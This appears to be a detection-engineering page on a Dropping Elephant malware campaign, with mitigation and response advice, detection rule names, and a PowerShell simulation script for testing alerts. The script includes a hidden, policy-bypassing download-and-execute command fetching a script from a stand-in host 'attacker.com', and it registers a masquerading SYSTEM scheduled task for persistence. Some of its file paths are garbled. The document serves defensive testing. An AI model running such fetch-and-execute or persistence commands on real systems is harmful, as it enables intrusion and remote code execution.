Malware à la Mode: Inside Dropping Elephant’s Loader Chain
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A sophisticated campaign attributed to Dropping Elephant uses China-themed decoy documents to deliver an updated, memory-resident remote access trojan. The intrusion relies on DLL sideloading through a legitimate Microsoft binary and the Donut shellcode loader to avoid disk-based detection. The final payload also uses advanced evasion methods, including control-flow flattening and runtime API reconstruction.
Investigation
Rapid7 researchers uncovered the threat during a proactive hunt that began with a malicious Windows shortcut masquerading as a PDF document. Their investigation followed the payload chain from initial staging on chinagreenenergy[.]org through DLL sideloading of APPWIZ.cpl to execution of an in-memory RAT. Code-level analysis with Diaphora confirmed a common lineage with earlier Dropping Elephant samples despite extensive reworking.
Mitigation
Defenders should prioritize behavioral detections, such as shortcut files launching PowerShell and suspicious payload staging in C:\Users\Public. Monitoring for scheduled tasks with unusual names and identifying DLL sideloading from unexpected directories is also important. In addition, endpoint defenses need memory-level visibility to catch tampering with AMSI, WLDP, and ETW.
Response
If this activity is detected, isolate affected systems immediately to disrupt further command-and-control traffic. Perform memory forensics to identify the injected RAT and inspect scheduled tasks for persistence. Network logs should also be reviewed for unauthorized HTTPS traffic to the known C2 domains and for any signs of file exfiltration.
Attack Flow
Detections
Possible IP Lookup Domain Communications Attempted (via dns)
View
Unusual Change Code Page Execution (via cmdline)
View
Suspicious Scheduled Task (via audit)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Vcruntime140 Dynamic Library Loaded From Suspicious Directory (via image_load)
View
Suspicious Files in Public User Profile (via file_event)
View
Detection of Dropping Elephant’s Malware Campaign [Windows Network Connection]
View
Malicious DLL Side-Loading via Fondue.exe [Windows File Event]
View
Dropping Elephant Malware Campaign Detection via Shortcut and Side-Loading [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands: The adversary aims to establish persistence and execute a downloader. To bypass standard email filters, they use a shortcut file named
GRES3001.lnkthat appears as a PDF. When clicked, it callsconhost.exeto run a PowerShell script. Simultaneously, they establish persistence by creating a scheduled task namedGoogleErrorReportwhich is designed to runFondue.exefrom a public directory, masquerading as a legitimate Google error reporter to evade casual inspection. -
Regression Test Script:
# 1. Simulate the Shortcut/Conhost behavior # We simulate the execution of conhost.exe with the specific string in the command line Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Note: To strictly match the rule's 'CommandLine contains GRES3001.lnk', we simulate the process call as if it came from that file. # Since we can't easily spoof the parent process name in a simple script, we simulate the command line string expected. Write-Host "[!] Simulating GRES3001.lnk trigger..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'" # In a real environment, the 'CommandLine' field in Sysmon would contain the target string. # 2. Simulate the Scheduled Task and Fondue.exe side-loading Write-Host "[!] Simulating GoogleErrorReport scheduled task..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force Write-Host "[+] Simulation Complete. Check SIEM for alerts." -
Cleanup Commands:
# Remove the dummy malware binary Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Remove the malicious scheduled task Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Cleanup Complete."